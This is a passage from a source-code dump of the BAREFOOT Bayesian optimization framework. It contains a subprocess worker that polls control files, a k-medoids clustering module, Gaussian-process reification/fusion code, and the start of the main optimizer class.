Couperthwaite\n\"\"\"\n\nfrom pickle import dump, load\nimport concurrent.futures\nimport numpy as np\nfrom sys import argv\nfrom time import sleep, time\nfrom multiprocessing import cpu_count\nfrom util import calculate_KG, calculate_EI, fused_calculate, calculate_TS, calculate_GPHedge\nimport logging\n\nif __name__ == \"__main__\":\n    \"\"\"\n    This module is used within the BAREFOOT framework to run as a multi-node instance\n    This module runs on each of the subprocess nodes and controls the calculations on that\n    node.\n    \"\"\"\n    param = argv\n    \n    # log_level = logging.DEBUG\n    log_level = logging.INFO\n    \n    # create logging instance to record progress of the calculations\n    logger = logging.getLogger('BAREFOOT.subprocess')\n    logger.setLevel(log_level)\n    fh = logging.FileHandler('BAREFOOT.log')\n    fh.setLevel(log_level)\n    # create formatter and add it to the handlers\n    formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n    fh.setFormatter(formatter)\n    # add the handler to the logger\n    logger.addHandler(fh)\n\n    logger.info(\"Subprocess {} | started\".format(param[1]))\n    \n    # Create a file to show that the subprocess has successfully started\n    with open(\"subprocess/sub{}.start\".format(param[1]), 'w') as f:\n        f.write(\"subprocess started successfully\\n\\n\")    \n    \n    not_close = True\n    # keep the code running until it is shut down by the main node\n    while not_close:\n        try:\n            try:\n                # the main code will create these files when it is time for a \n                # calculation to be done on the subprocess node\n                with open(\"subprocess/sub{}.control\".format(param[1]), 'rb') as f:\n                    control_param = load(f)\n                with open(\"subprocess/sub{}.start\".format(param[1]), 'a') as f:\n                    f.write(\"Control File Found - {} | {}\\n\".format(control_param[0], control_param[1]))\n                logger.debug(\"Control File Found - {} | {}\\n\".format(control_param[0], control_param[1]))\n            except FileNotFoundError:\n                # opening a missing control file raises FileNotFoundError\n                logger.debug(\"Control File could not be found\")\n                control_param = [1,1]\n            \n
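            # Layout of the pickled control-file list, as used throughout this\n            # module: control_param[0] is a status flag (0 = calculation\n            # requested by the main node, 1 = calculation completed),\n            # control_param[1] is the calculation type (\"iteration\" for the\n            # reduced order models or \"fused\" for the Truth Model step), and\n            # control_param[2] names the acquisition function (\"KG\", \"EI\",\n            # \"TS\" or \"Hedge\").\n            # The main node changes the control_param value to 0 to indicate that\n            # there is a calculation to complete\n            if control_param[0] == 0:\n                logger.info(\"{} | New Subprocess calculation started\\n\".format(param[1]))\n                # The main code also specifies which acquisition 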
function to use\n                if control_param[2] == \"KG\":\n                    function = calculate_KG\n                elif control_param[2] == \"EI\":\n                    function = calculate_EI\n                elif control_param[2] == \"TS\":\n                    function = calculate_TS\n                elif control_param[2] == \"Hedge\":\n                    function = calculate_GPHedge\n                \n                start = time()\n                # there is a difference between the calculations required for the\n                # reduced order models (iteration) and the truth model (fused)\n                if control_param[1] == \"iteration\":\n                    # Parameters for the calculations are determined in the\n                    # main node and are saved in .dump files for each subprocess\n                    with open(\"subprocess/{}.dump\".format(param[1]), 'rb') as f:\n                        parameters = load(f)\n                    logger.debug(\"{} | Reduced Order Model Calculation Started | {} Calculations\".format(param[1], len(parameters)))\n                    kg_output = []\n                    count = 0\n                    # Calculations are conducted in parallel using the concurrent.futures approach\n                    with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n                        for result_from_process in zip(parameters, executor.map(function,parameters)):\n                            params, results = result_from_process\n                            kg_output.append(results)\n                            count += 1\n                            if count % 200 == 0:\n                                logger.info(\"{} | {} / {} Calculations Completed\".format(param[1], count, len(parameters)))\n                    # Once calculations are completed, they are saved to the .output file for the main node to retrieve\n                    with open(\"subprocess/{}.output\".format(param[1]), 'wb') as f:\n                        dump(kg_output, f)\n                    \n                    \n                elif control_param[1] == \"fused\":\n                    # Parameters for the calculations are determined in the\n                    # main node and are saved in .dump files for each subprocess\n                    with open(\"subprocess/{}.dump\".format(param[1]), 'rb') as f:\n                        parameters = load(f)\n                    logger.debug(\"{} | Fused Model Calculation Started | {} Calculations\".format(param[1], len(parameters)))\n                    if control_param[2] == \"Hedge\":\n                        fused_out = [[],[],[],[]]\n                    else:\n                        fused_output = []\n                    count = 0\n                    # Calculations are conducted in parallel using the concurrent.futures approach\n                    with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n                        for result_from_process in zip(parameters, executor.map(fused_calculate,parameters)):\n                            params, results = result_from_process\n                            if control_param[2] == \"Hedge\":\n                                fused_out[0].append(results[0][0])\n                                fused_out[1].append(results[0][1])\n                                fused_out[2].append(results[0][2])\n                                fused_out[3].append(results[0][3])\n                            else:\n                                fused_output.append(results[0])\n                            count += 1\n                            if count % 200 == 0:\n                                logger.info(\"{} | {} / {} Calculations Completed\".format(param[1], count, len(parameters)))\n                    # if the acquisition function approach is the GP Hedge portfolio\n                    # optimization approach then the output from this function needs\n                    # no further processing. 
If any of the others are being used,\n # there is some processing to attempt to remove duplicates\n if control_param[2] == \"Hedge\":\n with open(\"subprocess/{}.output\".format(param[1]), 'wb') as f:\n dump(fused_out, f)\n else:\n \n max_values = np.zeros((results[1],2))\n \n for ii in range(len(fused_output)):\n if max_values[fused_output[ii][1],0] != 0:\n if max_values[fused_output[ii][1],0] < fused_output[ii][0]:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n else:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n \n fused_output = max_values[np.where(max_values[:,0]!=0)] \n # Once calculations are completed, they are saved to the .output file for the main node to retrieve\n with open(\"subprocess/{}.output\".format(param[1]), 'wb') as f:\n dump(fused_output, f)\n \n # After the calculation is completed, the control file parameter\n # is changed to 1 to indicate that it has completed\n with open(\"subprocess/sub{}.control\".format(param[1]), 'wb') as f:\n control_param[0] = 1\n dump(control_param, f)\n \n logger.info(\"{} | Calculation Results Dumped | {} hours\\n\".format(param[1], np.round((time()-start)/3600, 4)))\n \n except Exception as exc:\n logger.critical(\"Error completing Calculation | {}\".format(exc))\n pass\n \n sleep(10)\n\n try:\n # when the main node has completed all of its calculations, it will\n # create a close file that triggers this code to complete\n with open('subprocess/close{}'.format(param[1]), 'r') as f:\n d = f.read()\n not_close = False\n logger.debug(\"{} | Close Command Found\".format(param[1]))\n except FileNotFoundError:\n pass\n \n with open(\"subprocess/sub{}.start\".format(param[1]), 'a') as f:\n f.write(\"subprocess finished successfully\\n\\n\")\n logger.info(\"{} | Subprocess Finished\".format(param[1]))" }, { "alpha_fraction": 0.5780366659164429, "alphanum_fraction": 0.5848425626754761, "avg_line_length": 36.86026382446289, "blob_id": "21d5a4b7864c47fe7c1d6a50f4c3ec8d6bb2f3b7", "content_id": "e9e0655bb94795e5a1e68a702fdfe5a879268442", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8669, "license_type": "no_license", "max_line_length": 103, "num_lines": 229, "path": "/kmedoids.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 12:01:34 2020\n\nI currently cannot find the source of this code to attribute it correctly. 
As\nsuch I will note explicitly that this code was not produced by myself, but if\nanyone reading this who does know the source of this code, please notify me\nso that it can be correcly attributed.\n\n\"\"\"\n\nimport numpy as np\nfrom scipy.sparse import csr_matrix\nimport random\n\nclass KMedoids:\n def __init__(self, n_cluster=2, max_iter=10, tol=0.1, start_prob=0.8, end_prob=0.99):\n '''Kmedoids constructor called'''\n if start_prob < 0 or start_prob >= 1 or end_prob < 0 or end_prob >= 1 or start_prob > end_prob:\n raise ValueError('Invalid input')\n self.n_cluster = n_cluster\n self.max_iter = max_iter\n self.tol = tol\n self.start_prob = start_prob\n self.end_prob = end_prob\n \n self.medoids = []\n self.clusters = {}\n self.tol_reached = float('inf')\n self.current_distance = 0\n \n self.__data = None\n self.__is_csr = None\n self.__rows = 0\n self.__columns = 0\n self.cluster_distances = {}\n \n \n def fit(self, data):\n self.__data = data\n self.__set_data_type() \n self.__start_algo()\n return self\n \n def __start_algo(self):\n self.__initialize_medoids()\n self.clusters, self.cluster_distances = self.__calculate_clusters(self.medoids)\n self.__update_clusters()\n \n def __update_clusters(self):\n for i in range(self.max_iter):\n cluster_dist_with_new_medoids = self.__swap_and_recalculate_clusters()\n if self.__is_new_cluster_dist_small(cluster_dist_with_new_medoids) == True:\n self.clusters, self.cluster_distances = self.__calculate_clusters(self.medoids)\n else:\n break\n\n def __is_new_cluster_dist_small(self, cluster_dist_with_new_medoids):\n existance_dist = self.calculate_distance_of_clusters()\n new_dist = self.calculate_distance_of_clusters(cluster_dist_with_new_medoids)\n \n if existance_dist > new_dist and (existance_dist - new_dist) > self.tol:\n self.medoids = cluster_dist_with_new_medoids.keys()\n return True\n return False\n \n def calculate_distance_of_clusters(self, cluster_dist=None):\n if cluster_dist == None:\n cluster_dist = self.cluster_distances\n dist = 0\n for medoid in cluster_dist.keys():\n dist += cluster_dist[medoid]\n return dist\n \n def __swap_and_recalculate_clusters(self):\n # http://www.math.le.ac.uk/people/ag153/homepage/KmeansKmedoids/Kmeans_Kmedoids.html\n cluster_dist = {}\n for medoid in self.medoids:\n is_shortest_medoid_found = False\n for data_index in self.clusters[medoid]:\n if data_index != medoid:\n cluster_list = list(self.clusters[medoid])\n cluster_list[self.clusters[medoid].index(data_index)] = medoid\n new_distance = self.calculate_inter_cluster_distance(data_index, cluster_list)\n if new_distance < self.cluster_distances[medoid]:\n cluster_dist[data_index] = new_distance\n is_shortest_medoid_found = True\n break\n if is_shortest_medoid_found == False:\n cluster_dist[medoid] = self.cluster_distances[medoid]\n return cluster_dist\n \n def calculate_inter_cluster_distance(self, medoid, cluster_list):\n distance = 0\n for data_index in cluster_list:\n distance += self.__get_distance(medoid, data_index)\n return distance/len(cluster_list)\n \n def __calculate_clusters(self, medoids):\n clusters = {}\n cluster_distances = {}\n for medoid in medoids:\n clusters[medoid] = []\n cluster_distances[medoid] = 0\n \n for row in range(self.__rows):\n nearest_medoid, nearest_distance = self.__get_shortest_distance_to_mediod(row, medoids)\n cluster_distances[nearest_medoid] += nearest_distance\n clusters[nearest_medoid].append(row)\n \n for medoid in medoids:\n cluster_distances[medoid] /= len(clusters[medoid])\n return clusters, 
cluster_distances\n \n \n def __get_shortest_distance_to_mediod(self, row_index, medoids):\n min_distance = float('inf')\n current_medoid = None\n \n for medoid in medoids:\n current_distance = self.__get_distance(medoid, row_index)\n if current_distance < min_distance:\n min_distance = current_distance\n current_medoid = medoid\n return current_medoid, min_distance\n\n def __initialize_medoids(self):\n '''Kmeans++ initialisation'''\n self.medoids.append(random.randint(0,self.__rows-1))\n while len(self.medoids) != self.n_cluster:\n self.medoids.append(self.__find_distant_medoid())\n \n def __find_distant_medoid(self):\n distances = []\n indices = []\n for row in range(self.__rows):\n indices.append(row)\n distances.append(self.__get_shortest_distance_to_mediod(row,self.medoids)[1])\n distances_index = np.argsort(distances)\n choosen_dist = self.__select_distant_medoid(distances_index)\n return indices[choosen_dist]\n \n def __select_distant_medoid(self, distances_index):\n start_index = round(self.start_prob*len(distances_index))\n end_index = round(self.end_prob*(len(distances_index)-1)) \n return distances_index[random.randint(start_index, end_index)]\n\n \n def __get_distance(self, x1, x2):\n a = self.__data[x1].toarray() if self.__is_csr == True else np.array(self.__data[x1])\n b = self.__data[x2].toarray() if self.__is_csr == True else np.array(self.__data[x2])\n return np.linalg.norm(a-b)\n \n def __set_data_type(self):\n '''to check whether the given input is of type \"list\" or \"csr\" '''\n if isinstance(self.__data,csr_matrix):\n self.__is_csr = True\n self.__rows = self.__data.shape[0]\n self.__columns = self.__data.shape[1]\n elif isinstance(self.__data,list):\n self.__is_csr = False\n self.__rows = len(self.__data)\n self.__columns = len(self.__data[0])\n else:\n raise ValueError('Invalid input')\n \n \n\ndef kMedoids(D, k, tmax=100):\n # determine dimensions of distance matrix D\n m, n = D.shape\n\n if k > n:\n raise Exception('too many medoids')\n\n # find a set of valid initial cluster medoid indices since we\n # can't seed different clusters with two points at the same location\n valid_medoid_inds = set(range(n))\n invalid_medoid_inds = set([])\n rs,cs = np.where(D==0)\n # the rows, cols must be shuffled because we will keep the first duplicate below\n index_shuf = list(range(len(rs)))\n np.random.shuffle(index_shuf)\n rs = rs[index_shuf]\n cs = cs[index_shuf]\n for r,c in zip(rs,cs):\n # if there are two points with a distance of 0...\n # keep the first one for cluster init\n if r < c and r not in invalid_medoid_inds:\n invalid_medoid_inds.add(c)\n valid_medoid_inds = list(valid_medoid_inds - invalid_medoid_inds)\n\n if k > len(valid_medoid_inds):\n raise Exception('too many medoids (after removing {} duplicate points)'.format(\n len(invalid_medoid_inds)))\n\n # randomly initialize an array of k medoid indices\n M = np.array(valid_medoid_inds)\n np.random.shuffle(M)\n M = np.sort(M[:k])\n\n # create a copy of the array of medoid indices\n Mnew = np.copy(M)\n\n # initialize a dictionary to represent clusters\n C = {}\n for t in range(tmax):\n # determine clusters, i. e. 
arrays of data indices\n J = np.argmin(D[:,M], axis=1)\n for kappa in range(k):\n C[kappa] = np.where(J==kappa)[0]\n # update cluster medoids\n for kappa in range(k):\n J = np.mean(D[np.ix_(C[kappa],C[kappa])],axis=1)\n j = np.argmin(J)\n Mnew[kappa] = C[kappa][j]\n np.sort(Mnew)\n # check for convergence\n if np.array_equal(M, Mnew):\n break\n M = np.copy(Mnew)\n else:\n # final update of cluster memberships\n J = np.argmin(D[:,M], axis=1)\n for kappa in range(k):\n C[kappa] = np.where(J==kappa)[0]\n\n # return results\n return M, C" }, { "alpha_fraction": 0.5283722877502441, "alphanum_fraction": 0.5394659042358398, "avg_line_length": 41.24896240234375, "blob_id": "b6dd9a94df05da2c17917b075805c138c585757c", "content_id": "0fdbe4cab36054cc89bb3cf006a18617ec8fb8aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10186, "license_type": "no_license", "max_line_length": 118, "num_lines": 241, "path": "/reificationFusion.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 13:48:44 2020\n\n@author: richardcouperthwaite\n\"\"\"\n\nimport numpy as np\nfrom gpModel import gp_model\nimport matplotlib.pyplot as plt\n\ndef reification(y,sig): \n # This function takes lists of means and variances from multiple models and \n # calculates the fused mean and variance following the Reification/Fusion approach\n # developed by D. Allaire. This function can handle any number of models.\n yM = np.tile(y, (len(y),1,1)).transpose()\n sigM = np.tile(sig, (len(y),1,1)).transpose()\n \n unoM = np.tile(np.diag(np.ones(len(y))), (yM.shape[0],1,1))\n zeroM = np.abs(unoM-1)\n \n yMT = np.transpose(yM, (0,2,1))\n sigMT = np.transpose(sigM, (0,2,1))\n \n # The following individual value calculations are compacted into the single calculation\n # for alpha, but are left here to aid in understanding of the equation\n \n # rho1 = np.sqrt(sigM)/np.sqrt((yM-yMT)**2 + sigM)\n # rho2 = np.sqrt(sigMT)/np.sqrt((yMT-yM)**2 + sigMT)\n # rho = (sigM/(sigM+sigMT))*np.sqrt(sigM)/np.sqrt((yM-yMT)**2 + sigM) + \\\n # (sigMT/(sigM+sigMT))*np.sqrt(sigMT)/np.sqrt((yMT-yM)**2 + sigMT)\n # sigma = rho*zeroM*(np.sqrt(sigM*sigMT)) + varDiag\n # alpha = np.linalg.inv(sigma)\n \n alpha = np.linalg.pinv(((sigM/(sigM+sigMT))*np.sqrt(sigM)/np.sqrt((yM-yMT)**2 + sigM) + \\\n (sigMT/(sigM+sigMT))*np.sqrt(sigMT)/np.sqrt((yMT-yM)**2 + sigMT))*zeroM*(np.sqrt(sigM*sigMT)) + unoM*sigM)\n \n w = (np.sum(alpha,1)/np.sum(alpha))\n \n mean = np.sum(w@y, axis = 0)\n var = 1/np.sum(alpha,(1,2))\n \n return mean, var\n\nclass model_reification():\n \"\"\"\n This python class has been developed to aid with the reification/fusion approach.\n The class provides methods that automate much of the process of defining the \n discrepancy GPs and calculating the fused mean and variance\n \"\"\"\n def __init__(self, x_train, y_train, l_param, sigma_f, sigma_n, model_mean,\n model_std, l_param_err, sigma_f_err, sigma_n_err, \n x_true, y_true, num_models, num_dim, kernel):\n self.x_train = x_train\n self.y_train = y_train\n self.model_mean = model_mean\n self.model_std = model_std\n self.model_hp = {\"l\": np.array(l_param),\n \"sf\": np.array(sigma_f),\n \"sn\": np.array(sigma_n)}\n self.err_mean = []\n self.err_std = []\n self.err_model_hp = {\"l\": np.array(l_param_err),\n \"sf\": np.array(sigma_f_err),\n \"sn\": np.array(sigma_n_err)}\n self.x_true = x_true\n self.y_true = y_true\n self.num_models = num_models\n self.num_dim = 
num_dim\n        self.kernel = kernel\n        self.gp_models = self.create_gps()\n        self.gp_err_models = self.create_error_models()\n        self.fused_GP = ''\n        self.fused_y_mean = ''\n        self.fused_y_std = ''\n    \n    def create_gps(self):\n        \"\"\"\n        GPs need to be created for each of the lower dimension information sources\n        as used in the reification method. These can be multi-dimensional models.\n        As a result, the x_train and y_train data needs to be added to the class\n        as a list of numpy arrays.\n        \"\"\"\n        gp_models = []\n        for i in range(self.num_models):\n            new_model = gp_model(self.x_train[i], \n                                 (self.y_train[i]-self.model_mean[i])/self.model_std[i], \n                                 self.model_hp[\"l\"][i], \n                                 self.model_hp[\"sf\"][i], \n                                 self.model_hp[\"sn\"][i], \n                                 self.num_dim, \n                                 self.kernel)\n            gp_models.append(new_model)\n        return gp_models\n    \n    def create_error_models(self):\n        \"\"\"\n        In order to calculate the total error of the individual GPs an error\n        model is created for each GP. The inputs to this are the error between\n        the individual GP predictions and the truth value at all available truth\n        data points. The prior_error value is subtracted from the difference to\n        ensure that the points are centred around 0.\n        \"\"\"\n        gp_error_models = []\n        for i in range(self.num_models):\n            gpmodel_mean, gpmodel_var = self.gp_models[i].predict_var(self.x_true)\n            gpmodel_mean = gpmodel_mean * self.model_std[i] + self.model_mean[i]\n            error = np.abs(self.y_true-gpmodel_mean)\n            self.err_mean.append(np.mean(error))\n            self.err_std.append(np.std(error))\n            if self.err_std[i] == 0:\n                self.err_std[i] = 1\n            new_model = gp_model(self.x_true, \n                                 (error-self.err_mean[i])/self.err_std[i], \n                                 self.err_model_hp[\"l\"][i], \n                                 self.err_model_hp[\"sf\"][i], \n                                 self.err_model_hp[\"sn\"][i], \n                                 self.num_dim, \n                                 self.kernel)\n            gp_error_models.append(new_model)\n        return gp_error_models\n    \n    def create_fused_GP(self, x_test, l_param, sigma_f, sigma_n, kernel):\n        \"\"\"\n        In this function we create the fused model by calculating the fused mean\n        and variance at the x_test values and then fitting a GP model using the\n        given hyperparameters\n        \"\"\"\n        model_mean = []\n        model_var = []\n        for i in range(len(self.gp_models)):\n            m_mean, m_var = self.gp_models[i].predict_var(x_test)\n            m_mean = m_mean * self.model_std[i] + self.model_mean[i]\n            m_var = m_var * (self.model_std[i] ** 2)\n            model_mean.append(m_mean)\n            err_mean, err_var = self.gp_err_models[i].predict_var(x_test)\n            err_mean = err_mean * self.err_std[i] + self.err_mean[i]\n            model_var.append((err_mean)**2 + m_var)\n        fused_mean, fused_var = reification(model_mean, model_var)\n        self.fused_y_mean = np.mean(fused_mean[0:400:12])\n        self.fused_y_std = np.std(fused_mean[0:400:12])\n        if self.fused_y_std == 0:\n            self.fused_y_std = 1\n        fused_mean = (fused_mean - self.fused_y_mean)/self.fused_y_std\n        self.fused_GP = gp_model(x_test[0:400:12], \n                                 fused_mean[0:400:12], \n                                 l_param, \n                                 sigma_f, \n                                 abs(fused_var[0:400:12])**(0.5), \n                                 self.num_dim, \n                                 kernel)\n        return self.fused_GP\n    \n    def update_GP(self, new_x, new_y, model_index):\n        \"\"\"\n        Updates a given model in the reification object with new training data\n        and retrains the GP model\n        \"\"\"\n        self.x_train[model_index] = np.vstack((self.x_train[model_index], new_x))\n        self.y_train[model_index] = np.append(self.y_train[model_index], new_y)\n        self.gp_models[model_index].update(new_x, new_y, self.model_hp['sn'][model_index], False)\n    \n
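    # Typical call sequence for this class, as a sketch of how the framework\n    # uses it (see barefoot.py): construct the object with the initial data,\n    # then on each iteration call create_fused_GP(...) followed by\n    # predict_fused_GP(x) to query the fused model, and feed new evaluations\n    # back in through update_GP(...) for a reduced order model or\n    # update_truth(...) below for the Truth Model.\n    def update_truth(self, new_x, new_y):\n        \"\"\"\n        Updates the truth model in the reification object with new training data\n        and then 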
recalculates the error models\n        \"\"\"\n        self.x_true = np.vstack((self.x_true, new_x))\n        self.y_true = np.append(self.y_true, new_y)\n        self.gp_err_models = self.create_error_models()\n    \n    def predict_low_order(self, x_predict, index):\n        \"\"\"\n        Provides a prediction from the posterior distribution of one of the \n        low order models\n        \"\"\"\n        gpmodel_mean, gpmodel_var = self.gp_models[index].predict_var(x_predict)\n        gpmodel_mean = gpmodel_mean * self.model_std[index] + self.model_mean[index]\n        gpmodel_var = gpmodel_var * (self.model_std[index]**2)\n        return gpmodel_mean, gpmodel_var\n    \n    def predict_fused_GP(self, x_predict):\n        \"\"\"\n        Provides a prediction from the posterior distribution of the Fused Model\n        \"\"\"\n        gpmodel_mean, gpmodel_var = self.fused_GP.predict_var(x_predict)\n        gpmodel_mean = gpmodel_mean * self.fused_y_std + self.fused_y_mean\n        gpmodel_var = gpmodel_var * (self.fused_y_std**2)\n        return gpmodel_mean, np.diag(gpmodel_var)\n    \n    \ndef reification_old(y, sig):\n    \"\"\"\n    This function is coded to enable the reification of any number of models. \n    It relied on Python loops and was therefore rewritten as the vectorized\n    function above. It is left here as an aid to understanding the\n    computational approach used.\n    \"\"\"\n    mean_fused = []\n    var_fused = []\n    \n    rtest = []\n    \n    rho_bar = []\n    for i in range(len(y)-1):\n        for j in range(len(y)-i-1):\n            rho1 = np.divide(np.sqrt(sig[i]), np.sqrt((y[i]-y[j+i+1])**2 + sig[i]))\n            rtest.append(rho1)\n            rho2 = np.divide(np.sqrt(sig[j+i+1]), np.sqrt((y[j+i+1]-y[i])**2 + sig[j+i+1]))\n            rtest.append(rho2)\n            rho_bar_ij = np.divide(sig[j+i+1], (sig[i]+sig[j+i+1]))*rho1 + np.divide(sig[i], (sig[i]+sig[j+i+1]))*rho2\n            rho_bar_ij[np.where(rho_bar_ij>0.99)] = 0.99\n            rho_bar.append(rho_bar_ij)\n    \n    mm = rho_bar[0].shape[0]\n    \n    sigma = np.zeros((len(y), len(y)))\n    \n    for i in range(mm):\n        for j in range(len(y)):\n            for k in range(len(y)-j):\n                jj = j\n                kk = k+j\n                if jj == kk:\n                    sigma[jj,kk] = sig[jj][i]\n                else:\n                    sigma[jj,kk] = rho_bar[kk+jj-1][i]*np.sqrt(sig[jj][i]*sig[kk][i])\n                    sigma[kk,jj] = rho_bar[kk+jj-1][i]*np.sqrt(sig[jj][i]*sig[kk][i])\n\n        alpha = np.linalg.inv(sigma)\n        \n        w = np.sum(alpha,1)/np.sum(alpha)\n        mu = y[0][i]\n        for j in range(len(y)-1):\n            mu = np.hstack((mu,y[j+1][i]))\n        mean = np.sum(w@mu)\n        \n        mean_fused.append(mean)\n        var_fused.append(1/np.sum(alpha))\n    \n    return np.array(mean_fused), np.array(var_fused)\n    " }, { "alpha_fraction": 0.5435008406639099, "alphanum_fraction": 0.5497400164604187, "avg_line_length": 52.63503646850586, "blob_id": "e0412e60a824c1a2b4f655724b84be8c0a490adf", "content_id": "ee6defa83069045856a18eb647b88c4e492ffdf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 86550, "license_type": "no_license", "max_line_length": 159, "num_lines": 1644, "path": "/barefoot.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 8 08:11:50 2021\n\n@author: Richard Couperthwaite\n\"\"\"\n\nimport os\nfrom pickle import load, dump\nimport subprocess\nfrom time import time, sleep\nfrom shutil import rmtree\nimport numpy as np\nimport pandas as pd\nfrom reificationFusion import model_reification\nimport concurrent.futures\nfrom multiprocessing import cpu_count\nfrom copy import deepcopy\nfrom util import k_medoids, cartesian, call_model, apply_constraints\nfrom util import calculate_KG, calculate_EI, fused_calculate, calculate_TS, calculate_Greedy\nfrom util import 
calculate_GPHedge, evaluateFusedModel\nimport logging\n\nclass barefoot():\n def __init__(self, ROMModelList=[], TruthModel=[], calcInitData=True, \n initDataPathorNum=[], multiNode=0, workingDir=\".\", \n calculationName=\"Calculation\", nDim=1, input_resolution=5, restore_calc=False,\n updateROMafterTM=False, externalTM=False, acquisitionFunc=\"KG\",\n A=[], b=[], Aeq=[], beq=[], lb=[], ub=[], func=[], keepSubRunning=True, \n verbose=False, sampleScheme=\"LHS\", tmSampleOpt=\"Greedy\", logname=\"BAREFOOT\",\n maximize=True):\n \"\"\"\n Python Class for Batch Reification/Fusion Optimization (BAREFOOT) Framework Calculations\n\n Parameters\n ----------\n ROMModelList : This is the list of functions that are the cheap information sources.\n These need to be in a form that ensures that by providing the unit hypercube\n input, the function will provide the required output\n TruthModel : This is the Truth model, or the function that needs to be optimized.\n calcInitData : This variable controls whether the initial data is calculated for\n each of the models or is retrieved from a file\n initDataPathorNum : This variable holds the number of initial datapoints to evaluate for each\n information source (including the Truth Model), or, when initial data is \n loaded from a file, holds the path to the initial data file\n multiNode : This variable reflects the number of subprocesses that will be used\n for the calculations. A value of zero indicates all calculations will\n be completed on the main compute node.\n workingDir : This is the path to the working directory. In some cases it may be desirable\n to store data separately from the code, this will allow the data to be stored\n in alternate locations. Can also be used if the relative directory reference\n is not working correctly.\n calculationName : This is the name for the calculation and will change the results directory name\n nDim : The number of dimensions for the input space that will be used\n restore_calc : This parameter toggles whether the framework data is set up from the information\n provided or retrieved from a save_state file. This can be used to restart a calculation\n updateROMafterTM : This parameter allows the reduced order models to be retrained after getting more data\n from the Truth Model. The model function calls do not change, so the training needs to \n reflect in the same function.\n externalTM : In cases where it is necessary to evaluate the Truth Model separate to the\n framework (for example, if the Truth Model is an actual experiment), this toggles\n the output of the predicted points to a separate file for use externally. The\n framework is shut down after the data is output, see test examples for how to restart\n the framework after the external Truth Model has been evaluated\n acquisitionFunc : The acquisition function to use to evaluate the next best points for the reduced\n order models. 
Currently the options are \"KG\" for Knowledge Gradient and \"EI\" for expected\n                           improvement.\n        A, b, Aeq, beq : Equality and inequality constraints according to the following equations:\n                         1) A*x <= b\n                         2) Aeq*x == beq\n        ub, lb : Upper bounds and lower bounds for inputs, all inputs must receive a value\n                 (Specify 0 for lb and 1 for ub if there is no bound for that input)\n        func : function constraints, must take the input matrix (x) and output a vector of length\n               equal to the number of samples in the input matrix (x) with boolean values.\n        keepSubRunning : Determines whether the subprocesses are left running while calling the Truth Model\n        verbose : Determines the logging level for tracking the calculations.\n        \n        \"\"\"\n        if verbose:\n            log_level = logging.DEBUG\n        else:\n            log_level = logging.INFO\n        \n        # create logger to output framework progress\n        self.logger = logging.getLogger(logname)\n        self.logger.setLevel(log_level)\n        fh = logging.FileHandler('{}.log'.format(logname))\n        fh.setLevel(log_level)\n        # create formatter and add it to the handlers\n        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n        fh.setFormatter(formatter)\n        # add the handler to the logger\n        self.logger.addHandler(fh)\n        \n        \n        self.logger.info(\"#########################################################\")\n        self.logger.info(\"#                                                       #\")\n        self.logger.info(\"#        Start BAREFOOT Framework Initialization        #\")\n        self.logger.info(\"#                                                       #\")\n        self.logger.info(\"#########################################################\")\n        \n        # Restore a previous calculation and restart the timer or load new\n        # information and initialize\n        \n        if restore_calc:\n            if externalTM:\n                self.__external_TM_data_load(workingDir, calculationName)\n            else:\n                self.__load_from_save(workingDir, calculationName)\n            self.timeCheck = time()\n            self.logger.info(\"Previous Save State Restored\")\n        else:\n            self.timeCheck = time()\n            self.ROM = ROMModelList\n            self.TM = TruthModel\n            self.TMInitInput = []\n            self.TMInitOutput = []\n            self.ROMInitInput = []\n            self.ROMInitOutput = []\n            self.inputLabels = []\n            self.multinode = multiNode\n            self.workingDir = workingDir\n            self.calculationName = calculationName\n            self.calcInitData = calcInitData\n            self.initDataPathorNum = initDataPathorNum\n            self.currentIteration = -1\n            self.maximize = maximize\n            if tmSampleOpt in [\"Hedge\", \"Greedy\", \"EI\", \"KG\", \"TS\"]:\n                self.tmSampleOpt = tmSampleOpt\n            else:\n                self.tmSampleOpt = \"Greedy\"\n                self.logger.warning(\"Invalid Truth Model Acquisition Function! Using default (Greedy).\")\n            self.nDim = nDim\n            self.res = input_resolution\n            self.A = A\n            self.b = b\n            self.Aeq = Aeq\n            self.beq = beq\n            self.ub = ub\n            self.lb = lb\n            self.constr_func = func\n
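            # A worked illustration of the constraint conventions documented\n            # above (hypothetical values, not framework defaults): for a\n            # two-input problem where x0 + x1 <= 1 is required, one would pass\n            # A=[[1, 1]], b=[1] when constructing this class.\n            if sampleScheme in [\"LHS\", \"Grid\", \"Custom\"]:\n                self.sampleScheme = sampleScheme\n            else:\n                self.sampleScheme = \"LHS\"\n                self.logger.warning(\"Invalid Sample Scheme! Using default (LHS).\")\n            self.keepSubRunning = keepSubRunning\n            self.updateROMafterTM = updateROMafterTM\n            self.externalTM = externalTM\n            if acquisitionFunc in [\"Hedge\", \"Greedy\", \"EI\", \"KG\", \"TS\"]:\n                self.acquisitionFunc = acquisitionFunc\n            else:\n                self.acquisitionFunc = \"KG\"\n                self.logger.warning(\"Invalid ROM Acquisition Function! 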
